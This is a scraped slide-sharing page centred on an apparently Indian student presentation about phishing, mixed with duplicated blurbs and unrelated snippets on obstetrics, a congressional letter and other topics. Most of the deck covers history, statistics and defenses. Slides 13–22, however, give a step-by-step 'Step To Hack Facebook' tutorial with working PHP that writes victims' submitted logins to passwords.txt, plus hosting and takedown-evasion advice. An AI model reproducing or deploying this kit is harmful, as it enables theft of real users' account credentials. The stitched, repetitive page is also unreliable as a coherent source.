In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details, by masquerading as a trustworthy entity in an electronic attempting to acquire sensitive information such as usernames, passwords and credit card details, by masquerading as a trustworthy entity in an electronic communication. Phishing is a fraudulent e-mail that attempts to get you to divulge personal data that can then be used for illegitimate purposes.
From this ppt you can know about the basic of phishing with having some cases that tracked by the Indian police & also there are some section related to the Phishing.
I think this will be a good ppt for u.........suggestion will be invited on "singh7737777476@gmail.com" thankx for the downloading this & feel free to share your ideas.
Phishing basics: include its history
Introduction: phishing in detail
Techniques: Techniques used like link manipulation,web forgery
New phish: spear phishing
reason behind phishing
latest case study
survey: on top hosting and victim countries
Examples: popular website and email examples
Phishing--The Entire Story of a Dark WorldAvishek Datta
Phishing is a common problem in today's world. I have summarized some of the essential points needed for anyone to safeguard against all known Phishing attacks.
From this ppt you can know about the basic of phishing with having some cases that tracked by the Indian police & also there are some section related to the Phishing.
I think this will be a good ppt for u.........suggestion will be invited on "singh7737777476@gmail.com" thankx for the downloading this & feel free to share your ideas.
Phishing basics: include its history
Introduction: phishing in detail
Techniques: Techniques used like link manipulation,web forgery
New phish: spear phishing
reason behind phishing
latest case study
survey: on top hosting and victim countries
Examples: popular website and email examples
Phishing--The Entire Story of a Dark WorldAvishek Datta
Phishing is a common problem in today's world. I have summarized some of the essential points needed for anyone to safeguard against all known Phishing attacks.
Phishing is one of the oldest tricks in the book of hackers. But as old as it might be, phishing still remains the most lucrative tool for cybercriminals. In this presentation, we will help you understand about phishing and tell you how you can avoid phishing attacks.
This is a presentation I have delivered to many organisations over the past 12 months on the subject of Spear Phishing. It shows how easily companies can fall victim to Spear Phishing attacks and the methods that criminals use to increase their chances of success.
2017 Phishing Trends & Intelligence Report: Hacking the HumanPhishLabs
PhishLabs' Phishing Trends and Intelligence annual report provides insight on significant trends, tools, and techniques used by threat actors to carry out phishing attacks. It provides context and perspective into HOW and WHY these trends are occurring
By understanding the threat, we can better defend against it. The report data is sourced from more than one million confirmed phishing sites residing across more than 170,000 unique domains. We investigated more than 7,800 phishing attacks every month, identifying the underlying infrastructure used in the attacks and shutting them down. The report uses this data to illuminate significant trends, tools, and techniques being used by the threat actors.
Do download the on-demand full webinar, click here: https://info.phishlabs.com/phishing-trends-and-intelligence-pti-report-webinar
Do download the PTI Report, click here: https://info.phishlabs.com/2017-phishing-trends-and-intelligence-report-pti
Phishing attack, with SSL Encryption and HTTPS WorkingSachin Saini
This presentation contains Introduction of Phishing attack, its types and Various techniques, their impact with real live example, after that its Avoidance, Prevention and Solution. Also it contains brief introduction of SSL and HTTPS with their working.
Phishing is one of the oldest tricks in the book of hackers. But as old as it might be, phishing still remains the most lucrative tool for cybercriminals. In this presentation, we will help you understand about phishing and tell you how you can avoid phishing attacks.
This is a presentation I have delivered to many organisations over the past 12 months on the subject of Spear Phishing. It shows how easily companies can fall victim to Spear Phishing attacks and the methods that criminals use to increase their chances of success.
2017 Phishing Trends & Intelligence Report: Hacking the HumanPhishLabs
PhishLabs' Phishing Trends and Intelligence annual report provides insight on significant trends, tools, and techniques used by threat actors to carry out phishing attacks. It provides context and perspective into HOW and WHY these trends are occurring
By understanding the threat, we can better defend against it. The report data is sourced from more than one million confirmed phishing sites residing across more than 170,000 unique domains. We investigated more than 7,800 phishing attacks every month, identifying the underlying infrastructure used in the attacks and shutting them down. The report uses this data to illuminate significant trends, tools, and techniques being used by the threat actors.
Do download the on-demand full webinar, click here: https://info.phishlabs.com/phishing-trends-and-intelligence-pti-report-webinar
Do download the PTI Report, click here: https://info.phishlabs.com/2017-phishing-trends-and-intelligence-report-pti
Phishing attack, with SSL Encryption and HTTPS WorkingSachin Saini
This presentation contains Introduction of Phishing attack, its types and Various techniques, their impact with real live example, after that its Avoidance, Prevention and Solution. Also it contains brief introduction of SSL and HTTPS with their working.
Info Session on Cybersecurity & Cybersecurity Study JamsGDSCCVR
In an era where digital threats are ever-evolving, understanding the fundamentals of cybersecurity is crucial.
Highlights of the Event:
💡 Google Cybersecurity Certification Scholarship.
🎭 Cloning and Phishing Demystified
🚨 Unravelling the Depths of Database Breaches
🛡️ Digital safety 101
🧼 Self-Check for Cyber Hygiene
⏺️ Event Details:
Date: 18th December 2023
Time: 6:00 PM to 7:00 PM
Venue: Online
It is contain knowledge about Phishing and how it happen. It also contain knowledge about how we can prevent that. So this slide contain all the basic knowledge about phishing and anti-phishing.
CyberSecurity - Computers In Libraries 2024Brian Pichman
Protecting privacy and security while leveraging technology to accomplish positive change is becoming a serious challenge for individuals, communities, and businesses. This workshop, led by expert leaders and practitioners, covers personal and organizational privacy as well as top security issues for libraries and their communities, especially the implications of AI. If you don’t have a security plan in place, are unsure of where to even start to make sure your library is secure, or have an existing plan in place but want to cross your T’s and dot your I’s, come to this interactive workshop.
Online Brand Protection:Fighting Domain Name Typosquatting, Website Spoofing...WhoisXML API
Your domain name represents your online identity. Its misuse and abuse can be likened to destroying your brand’s reputation. Identify some wide-spread threats that domains face, along with, a practical solution to help you keep your brand safe online.
Cybersecurity - Defense Against The Dark Arts Harry Potter StyleBrian Pichman
Step right into a realm where cyber security meets the enchanting world of Harry Potter! Join Brian Pichman, our fearless Defense Against the Dark Arts wizard, as he unveils the secrets to safeguarding our digital realms. Prepare to be captivated as Brian illuminates the spellbinding techniques of encryption, firewalls, and intrusion detection, equipping us to fortify our cherished data against the sinister forces of the digital realm.
But beware! Just like in the magical world, treacherous adversaries prowl the shadows. Brian will expose the dark arts of phishing, ransomware, and social engineering, empowering us to defend our digital castles. Engrossed in tales of peril and armed with ancient cyber security spells, this captivating presentation promises to leave you spellbound and ready to protect yourself in this ever-evolving landscape. So grab your wands and brace yourselves as Brian Pichman conjures a shield of protection, ensuring the safety of our digital realms against the forces of darkness. Together, we shall prevail in this journey of cyber security and magic.
Protecting Your Business from Cybercrime - Cybersecurity 101David J Rosenthal
Cybercrime impacts a lot of users every year.
Indirectly (compromised merchant – credit card)
Directly (compromised login credentials)
Cybercrime’s impact can be financial and reputation to your company
Impacts 1 in 5 small businesses every year
Cybercrime is a global business
The Internet allows attackers to be anywhere in the world and attacking victims anywhere in the world
Today more organized and motivated than any time in history
Based on the below and using the 12 categories of threats identify 3 .pdfarri2009av
Based on the below and using the 12 categories of threats identify 3 examples you can find
online, in the media for each of the threats listed on the right column. You can use news articles
to justify the threats. Use the most current news article you can find. Add the reference link for
each article and place in APA format. Prepare a memo to your CEO with your finding. On the
same memo research current vendors that provide phishing email tools to train your employees
and provide a recommendation to the CEO about which to buy. Compare at least 2 vendors and
identify the following. Features Cost Add the Phishing Quiz Exercise discussed in class to the
bottom of your memo pages. Take the quiz and answer the below Identify which questions you
got wrong from the quiz Provide a brief explanation on why you got it wrong. What did you
learn about phishing emails and what would you recommend in order to avoid falling for a
phishing email?
Solution
1) Threat to intellectual property: Hacking , After conducting a forensic review of the drives,
Bailey(CEO of IT company) learned that intruders had been lurking on two of his company’s
servers for almost a year. These hackers, who were traced to a university in Beijing, had entered
the company’s extranet through an unpatched vulnerability in the Solaris operating system. As
far as Bailey could tell, they hadn’t accessed any classified information. But they were able to
view mountains of intellectual property, including design information and product specifications
related to transportation and communications systems, along with information belonging to the
company’s customers and partners.
Activist hackers, or hacktivists, can also be a danger to companies. For example, early last year
members of Anonymous, the hacker collective, copied and publicly released sensitive files of
H.B. Gary Federal, a security company.
Cpoyrights deviation or piracy :
Intellectual property theft involves robbing people or companies of their ideas, inventions, and
creative expressions—known as “intellectual property”—which can include everything from
trade secrets and proprietary products and parts to movies, music, and software.
It is a growing threat—especially with the rise of digital technologies and Internet file sharing
networks. And much of the theft takes place overseas, where laws are often lax and enforcement
is more difficult. All told, intellectual property theft costs U.S. businesses billions of dollars a
year and robs the nation of jobs and tax revenues.
Preventing intellectual property theft is a priority of the FBI’s criminal investigative program. It
specifically focuses on the theft of trade secrets and infringements on products that can impact
consumers’ health and safety, such as counterfeit aircraft, car, and electronic parts. Key to the
program’s success is linking the considerable resources and efforts of the private sector with law
enforcement partners on local, state, federal, and international levels.
.
IRJET-Content based approach for Detection of Phishing SitesIRJET Journal
Anjali Gupta, Juili Joshi, Khyati Thakker, Chitra bhole "Content based approach for Detection of Phishing Sites", International Research Journal of Engineering and Technology (IRJET), Volume2,issue-01 April 2015.e-ISSN:2395-0056, p-ISSN:2395-0072. www.irjet.net
Abstract
Phishing is a significant problem involving fraudulent email and web sites that trick unsuspecting users into revealing private information. In this paper, we present the design, implementation, and evaluation of content-based approach to detecting phishing web sites. We also discuss the design and evaluation of several heuristics we developed to reduce false positives. Our experiments show that CANTINA is good at detecting phishing sites, correctly labeling approximately 95% of phishing sites.We are going to implement Revelation of Masquerade Attacks: A Content-Based Approach to Detecting Phishing Web Sites using PHP & MYSQL.Our system will crawl the original site of bank and it will retrieve all URL’s, location of bank’s server and whois information. If user get any email with phishing attack link. Then our system will take that url as input and crawl the link, retrieve all url’s and system will compare these url’s with original banks url database, try to find url’s are similar or not. Then system will find location of Phishing link URL and compare location with original banks location. After that system will find out Whois information of URL.System will analyze the information and show the results to the user.
Imagine yourself in the world where the users of the computer of today’s internet world don’t have to run, install or store their application or data on their own computers, imagine the world where every piece of your information or data would reside on the Cloud (Internet).
REMOTE Admittance DESKTOP software the administrator can control the operations of the remote system from his system itself.
• The administrator can get the configuration of the remote system from the server system itself using this software.
• In order to terminate the operations on the remote systems, the administrator can obtain the current process details of the remote systems from the server itself.
• Running rmi registry in the client systems performs all the above operations.
Frame relay is a standardized wide area network technology that specifies the
physical and logical link layers of digital telecommunications channels using
a packet switching methodology.
The Cloud is a term with a long history in telephony, which has in the past decade, been adopted as a metaphor for internet based services, with a common depiction in network diagrams as a cloud outline.
Synthetic Fiber Construction in lab .pptxPavel ( NSTU)
Synthetic fiber production is a fascinating and complex field that blends chemistry, engineering, and environmental science. By understanding these aspects, students can gain a comprehensive view of synthetic fiber production, its impact on society and the environment, and the potential for future innovations. Synthetic fibers play a crucial role in modern society, impacting various aspects of daily life, industry, and the environment. ynthetic fibers are integral to modern life, offering a range of benefits from cost-effectiveness and versatility to innovative applications and performance characteristics. While they pose environmental challenges, ongoing research and development aim to create more sustainable and eco-friendly alternatives. Understanding the importance of synthetic fibers helps in appreciating their role in the economy, industry, and daily life, while also emphasizing the need for sustainable practices and innovation.
Operation “Blue Star” is the only event in the history of Independent India where the state went into war with its own people. Even after about 40 years it is not clear if it was culmination of states anger over people of the region, a political game of power or start of dictatorial chapter in the democratic setup.
The people of Punjab felt alienated from main stream due to denial of their just demands during a long democratic struggle since independence. As it happen all over the word, it led to militant struggle with great loss of lives of military, police and civilian personnel. Killing of Indira Gandhi and massacre of innocent Sikhs in Delhi and other India cities was also associated with this movement.
Safalta Digital marketing institute in Noida, provide complete applications that encompass a huge range of virtual advertising and marketing additives, which includes search engine optimization, virtual communication advertising, pay-per-click on marketing, content material advertising, internet analytics, and greater. These university courses are designed for students who possess a comprehensive understanding of virtual marketing strategies and attributes.Safalta Digital Marketing Institute in Noida is a first choice for young individuals or students who are looking to start their careers in the field of digital advertising. The institute gives specialized courses designed and certification.
for beginners, providing thorough training in areas such as SEO, digital communication marketing, and PPC training in Noida. After finishing the program, students receive the certifications recognised by top different universitie, setting a strong foundation for a successful career in digital marketing.
Model Attribute Check Company Auto PropertyCeline George
In Odoo, the multi-company feature allows you to manage multiple companies within a single Odoo database instance. Each company can have its own configurations while still sharing common resources such as products, customers, and suppliers.
Normal Labour/ Stages of Labour/ Mechanism of LabourWasim Ak
Normal labor is also termed spontaneous labor, defined as the natural physiological process through which the fetus, placenta, and membranes are expelled from the uterus through the birth canal at term (37 to 42 weeks
June 3, 2024 Anti-Semitism Letter Sent to MIT President Kornbluth and MIT Cor...Levi Shapiro
Letter from the Congress of the United States regarding Anti-Semitism sent June 3rd to MIT President Sally Kornbluth, MIT Corp Chair, Mark Gorenberg
Dear Dr. Kornbluth and Mr. Gorenberg,
The US House of Representatives is deeply concerned by ongoing and pervasive acts of antisemitic
harassment and intimidation at the Massachusetts Institute of Technology (MIT). Failing to act decisively to ensure a safe learning environment for all students would be a grave dereliction of your responsibilities as President of MIT and Chair of the MIT Corporation.
This Congress will not stand idly by and allow an environment hostile to Jewish students to persist. The House believes that your institution is in violation of Title VI of the Civil Rights Act, and the inability or
unwillingness to rectify this violation through action requires accountability.
Postsecondary education is a unique opportunity for students to learn and have their ideas and beliefs challenged. However, universities receiving hundreds of millions of federal funds annually have denied
students that opportunity and have been hijacked to become venues for the promotion of terrorism, antisemitic harassment and intimidation, unlawful encampments, and in some cases, assaults and riots.
The House of Representatives will not countenance the use of federal funds to indoctrinate students into hateful, antisemitic, anti-American supporters of terrorism. Investigations into campus antisemitism by the Committee on Education and the Workforce and the Committee on Ways and Means have been expanded into a Congress-wide probe across all relevant jurisdictions to address this national crisis. The undersigned Committees will conduct oversight into the use of federal funds at MIT and its learning environment under authorities granted to each Committee.
• The Committee on Education and the Workforce has been investigating your institution since December 7, 2023. The Committee has broad jurisdiction over postsecondary education, including its compliance with Title VI of the Civil Rights Act, campus safety concerns over disruptions to the learning environment, and the awarding of federal student aid under the Higher Education Act.
• The Committee on Oversight and Accountability is investigating the sources of funding and other support flowing to groups espousing pro-Hamas propaganda and engaged in antisemitic harassment and intimidation of students. The Committee on Oversight and Accountability is the principal oversight committee of the US House of Representatives and has broad authority to investigate “any matter” at “any time” under House Rule X.
• The Committee on Ways and Means has been investigating several universities since November 15, 2023, when the Committee held a hearing entitled From Ivory Towers to Dark Corners: Investigating the Nexus Between Antisemitism, Tax-Exempt Universities, and Terror Financing. The Committee followed the hearing with letters to those institutions on January 10, 202
Embracing GenAI - A Strategic ImperativePeter Windle
Artificial Intelligence (AI) technologies such as Generative AI, Image Generators and Large Language Models have had a dramatic impact on teaching, learning and assessment over the past 18 months. The most immediate threat AI posed was to Academic Integrity with Higher Education Institutes (HEIs) focusing their efforts on combating the use of GenAI in assessment. Guidelines were developed for staff and students, policies put in place too. Innovative educators have forged paths in the use of Generative AI for teaching, learning and assessments leading to pockets of transformation springing up across HEIs, often with little or no top-down guidance, support or direction.
This Gasta posits a strategic approach to integrating AI into HEIs to prepare staff, students and the curriculum for an evolving world and workplace. We will highlight the advantages of working with these technologies beyond the realm of teaching, learning and assessment by considering prompt engineering skills, industry impact, curriculum changes, and the need for staff upskilling. In contrast, not engaging strategically with Generative AI poses risks, including falling behind peers, missed opportunities and failing to ensure our graduates remain employable. The rapid evolution of AI technologies necessitates a proactive and strategic approach if we are to remain relevant.
Biological screening of herbal drugs: Introduction and Need for
Phyto-Pharmacological Screening, New Strategies for evaluating
Natural Products, In vitro evaluation techniques for Antioxidants, Antimicrobial and Anticancer drugs. In vivo evaluation techniques
for Anti-inflammatory, Antiulcer, Anticancer, Wound healing, Antidiabetic, Hepatoprotective, Cardio protective, Diuretics and
Antifertility, Toxicity studies as per OECD guidelines
2. Agenda
1:- INTRODUCTION,DEFINITION AND DESCRIPTION OF
PHISHING
2:- HISTORY AND CURRENT STATUS OF PHISHING
3:- PHISHING TECHNIQUES
4:- HACKING FACEBOOK ACCOUNTS BY PHISHING – STEP
BY STEP!
5:- DAMAGED CAUSED BY PHISHING AND ANTIPHISHING
6:-How To Combat Phishing
What to do ? And What not to do?
7:- RECENT PHISHING ATTEMPTS,LEGAL RESPONSE AND
CASE STUDY
3. DEFINITION AND DESCRIPTION
• Phishing is an act of attempt to acquire information such as
usernames,passwords, and credit card details,etc of a person
or organization illegaly in an electronic communication.
• Phishing is committed so that the Phisher may obtain sensitive
and valuable information about a consumer, usually with the
goal of fraud to obtain the customer bank and other financial
information.
• Phishing are typically carried out by e-mail spoofing or instant
messaging.
4.
5. • In phishing the criminals creates a fake website whose looks
and feel are identical to the legitimate one, in which the
victims are told to enter their confidential details like
username, password or account details.
• Phishing technique was described in detail in the year 1987
and this technique was first used in the year 1995
• Phishing is mainly commited ,so that the criminal may obtain
sensitive & valuable information about the customer.
• Phishing makes high profit with less or small technological
investment
6. History
Phreaking + Fishing = Phishing
- Phreaking = making phone calls for free back in 70’s
• - Fishing = Use bait to lure the target
Phishing in 1995
Target: AOL users
Purpose: getting account passwords for free time
Threat level: low
Techniques: Similar names ( www.ao1.com for www.aol.com ), social
engineering
Phishing in 2001
Target: Ebayers and major banks
Purpose: getting credit card numbers, accounts
Threat level: medium
Techniques: Same in 1995, keylogger
Phishing in 2007
Target: Paypal, banks, ebay
Purpose: bank accounts
Threat level: high
Techniques: browser vulnerabilities, link obfuscation
7. Current status of Phishing
• • The APWG received 26,150 unique phishing reports.
• This total represents the second highest number of phishing
reports that the APWG has received in a single month.
• • The APWG detected 10,091 unique phishing websites
worldwide.
• • 148 separate corporate brands were “hijacked” (misused) in
phishing schemes (compared to 84 in August 2005v).
• • The financial sector was the most heavily targeted for
phishing schemes, constituting 92.6 percent of all phishing
attacks
8. • • The APWG found 2,303 unique websites that hosted
“keylogging.” programs.
• • The United States was the country hosting the largest
percentage of phishing websites (27.7 percent, compared to
27.9 percent in August 2005), while Canada ranked ninth
among countries hosting such websites (2.2 percent,
compared to 2.21 percent in August 2005). China remains the
second most frequent host of phishing websites (14 percent,
compared to 12.15 percent in August 2005), and South Korea
the third most frequent host of such sites (9.59 percent,
compared to 9.6 percent in August 2005).
9. • A very recent and popular case of phishing is that the chinese
phishers are targeting GMAIL account of high ranked official of
united states,south korea government and military
information & chinese political activities.
10. Phishing Technique
Deceptive - Sending a deceptive email, in bulk, with
a “call to action” that demands the recipient click on
a link.
Malware-Based - Running malicious software on the user’s
machine. Various forms of malware-based phishing are:
Key Loggers & Screen Loggers
Session Hijackers
Web Trojans
Data Theft
DNS-Based - Phishing that interferes with the integrity of the
lookup process for a domain name. Forms of DNS-based phishing
are:
Hosts file poisoning
Polluting user’s DNS cache
Proxy server compromise
11. Content-Injection – Inserting malicious content into legitimate
site.
Three primary types of content-injection phishing:
Hackers can compromise a server through a security
vulnerability and replace or augment the legitimate
content with malicious content.
Malicious content can be inserted into a site through a
cross-site scripting vulnerability.
Malicious actions can be performed on a site through a
SQL injection vulnerability.
12. • Man-in-the-Middle Phishing - Phisher positions
himself between the user and the legitimate site.
• Search Engine Phishing - Create web pages for fake
products, get the pages indexed by search engines,
and wait for users to enter their confidential
information as part of an order, sign-up, or balance
transfer.
13. Step To Hack Facebook
• Step 1: Go to http://www.facebook.com and right-click on the
home page and select view page source.
14. • Step 2: Find for something which looks like this :
15. Step 3: Then change the action URL to login.php, now it will
look similar to this.
Save it as index.html.
16. • Step 4: Open a notepad and paste the following code inside it and
save as login.php.
<?php
header (‘Location: http://www.facebook.com’);
$handle = fopen(“passwords.txt”, “a”);
foreach($_POST as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>
Here, the victim will be redirected to http://www.facebook.com. You
can change it to your desired location by editing the arguments of
header function in the above PHP code.
17. • Step 5: Create another blank text file for storing the hacked
usernames and passwords and name it as passwords.txt.
Now you are done with the setup of phishing page, all you
need to do is host it somewhere on internet so that it
becomes available to your victim.
• Step 6: Go to some free hosting site
like http://www.000webhost.com and sign up for free. You will
be provided with 1.5GB free space to host your web pages and
free domain. You will have to complete email confirmation
step to get your web page running.
18. • Step 7: Once you get your account activated, sign in and
click Go to CPanel as shown below.
20. • Step 9: Now you will see a folder public html in the web
based ftp client page, click on the folder and open it.
21. • Step 10: Click on Upload and select all the 3 files and finally
click on the green tick to upload them as shown in the image
below.
• Once you get your files uploaded you can check your page at
your registered domain.
22. • The victim’s password will be automatically written
into passwords.txt file, just open the file to see the username
and password!
• Congratulations you are done creating your phishing page! If
you have understood everything perfectly then you can use
this technique to create phishing pages for other sites also.
• Note: Phishing pages at free hosting services will be
immediately deleted, if once detected. So my advice is to use
a paid hosting service or else host it on your system.
23. DAMAGE CAUSE BY PHISHING
• The Impact of phishing are both domestic and international,
that are concern with the commercial and financial sectors.
• Direct Financial Loss. Phishing technique is mainly done to
make financial loss to a person or an organization. In this and
consumers and businesses may lose from a few hundred
dollars to millions of dollars.
• • Erosion of Public Trust in the Internet. Phishing also
decreases the public’s trust in the Internet.
24.
25. • A survey found that 9 out of 10 American adult Internet users
have made changes to their Internet habits because of the
threat of identity theft.
• The 30 percent say that they reduced their overall usage.
• The 25 percent say they have stopped shopping online, while
29 percent of those that still shop online say they have
decreased the frequency of their purchases.
26. Anti-Phishing
Anti-Phishing Working Group (APWG)
The APWG has over 2300+ members from over
1500 companies & agencies worldwide. Member
companies include leading security companies such
as Symantec, McAfee and VeriSign. Financial
Industry members include the ING Group,VISA,
Mastercard and the American Bankers Association.
27. Educate application users
Think before you open
Never click on the links in an email , message boards or mailing
lists
Never submit credentials on forms embedded in emails
Inspect the address bar and SSL certificate
Never open suspicious emails
Ensure that the web browser has the latest security patch applied
Install latest anti-virus packages
Destroy any hard copy of sensitive information
Verify the accounts and transactions regularly
Report the scam via phone or email.
28. Formulate and enforce Best practices
Authorization controls and access privileges for systems,
databases and applications.
Access to any information should be based on need-to-
know principle
Segregation of duties.
Media should be disposed only after erasing sensitive
information.
Reinforce application development / maintenance processes:
1. Web page personalization
Using two pages to authenticate the users.
Using Client-side persistent cookies.
2. Content Validation
Never inherently trust the submitted data
Never present the submitted data back to an application user
without sanitizing the same
Always sanitize data before processing or storing
Check the HTTP referrer header
29. 3. Session Handling
Make session identifiers long, complicated and difficult to
guess.
Set expiry time limits for the SessionID’s and should be
checked for every client request.
Application should be capable of revoking active SessionID’s
and not recycle the same SessionID.
Any attempt the invalid SessionID should be redirected to the
login page.
Never accept session information within a URL.
Protect the session via SSL.
Session data should be submitted as a POST.
After authenticating, a new SessionID should be used (HTTP &
HTTPS).
Never let the users choose the SessionID.
4. Image Regulation
Image Cycling
Session-bound images
30. 5. URL Qualification
Do not reference redirection URL in the browser’s URL
Always maintain a valid approved list of redirection url’s
Never allow customers to supply their own URL’s
Never allow IP addresses to be user in URL information
6. Authentication Process
Ensure that a 2-phase login process is in place
Personalize the content
Design a strong token-based authentication
7. Transaction non-repudiation
To ensure authenticity and integrity of the transaction
31. PREVENTION TO BE TAKEN
TO AVOID PHISHING
• 1. Prevention: What to Do
• Protect your computer with anti-virus software, spyware
filters, e-mail filters, and firewall programs, and make sure
that they are regularly updated.
• Ensure that your Internet browser is up to date and security
patches applied.
• Avoid responding to any unknown email or giving your
financial information to that mail.
32. • Unless the e-mail is digitally signed, it should also be fake.
• Phishers typically ask for information such as usernames,
passwords, credit card numbers, social security numbers, etc.
• Phisher e-mails are typically not personalized, while valid
messages from your bank or e-commerce company are
generally personalized.
• • Always ensure that you're using a secure website when
submitting credit card or other sensitive information via your
Web browser.
33. • To make sure you're on a secure Web server, check the
beginning of the Web address in your browsers address bar - it
should be "https://" rather than just "http://."
• Regularly log into your online accounts. Don't leave them for
a long period of time.
• Regularly check your bank, credit and debit card statements
to ensure that all transactions are legitimate.
• If anything is suspicious, contact your bank and all card
issuers.
34.
35. 2. Prevention: What Not to Do
• Don't assume that you can correctly identify a website
as legitimate by just looking at it.
• Don’t use the links in an e-mail to get to any web page, if
you think that the message might not be authentic.
log onto the website directly by typing in the Web address
in your browser.
• Avoid filling out forms in e-mail messages that ask for
personal financial information.
36. • You should only communicate information such as credit card
numbers or account information via a secure website or the
telephone.
37. What does all the above imply?
It is better to be safer now than feel sorry later.
38. Case study
Case - fraud done by Mumbai mafia in IT city
City- Bangalore
State- karnatka
Background
•
• The cyber crime police of Bangalore, after a two year
investigation have proved that the Mumbai mafia is phishing
the it city
• In this they have arrested three persons in connection in with
3 different incident.
•
• A cid official of SP’s rank said that this is a dangerous trend.
39. The cyber crime police station (CCPS) registered around
100 such phishing cases in 2009,but it’s difficult for
them to trace every case as they use benami bank
account to do all this.
In this the cyber crime police had arrested 3 person ,all
from Mumbai who are connected with this case.
• The police said that all the arrested person are graduate
and have a good knowledge in computer
40. Investigation
• The cyber crime police had arrested one abdul khan from
Mumbai.
• The arrested person had transferred rs 1 lakh (rs 50000 in
twice) from the icici account of one it professional abhishek
malvia anative of itarsi , Madhya Pradesh.
41. Conclusion
• Phishing is a form of criminal conduct that poses increasing
threats to consumers, financial institutions, and commercial
enterprises in Canada, the United States, and other countries.
Because phishing shows no sign of abating, and indeed is likely
to continue in newer and more sophisticated forms, law
enforcement, other government agencies, and the private
sector in both countries will need to cooperate more closely
than ever in their efforts to combat phishing, through
improved public education, prevention, authentication, and
binational and national enforcement efforts.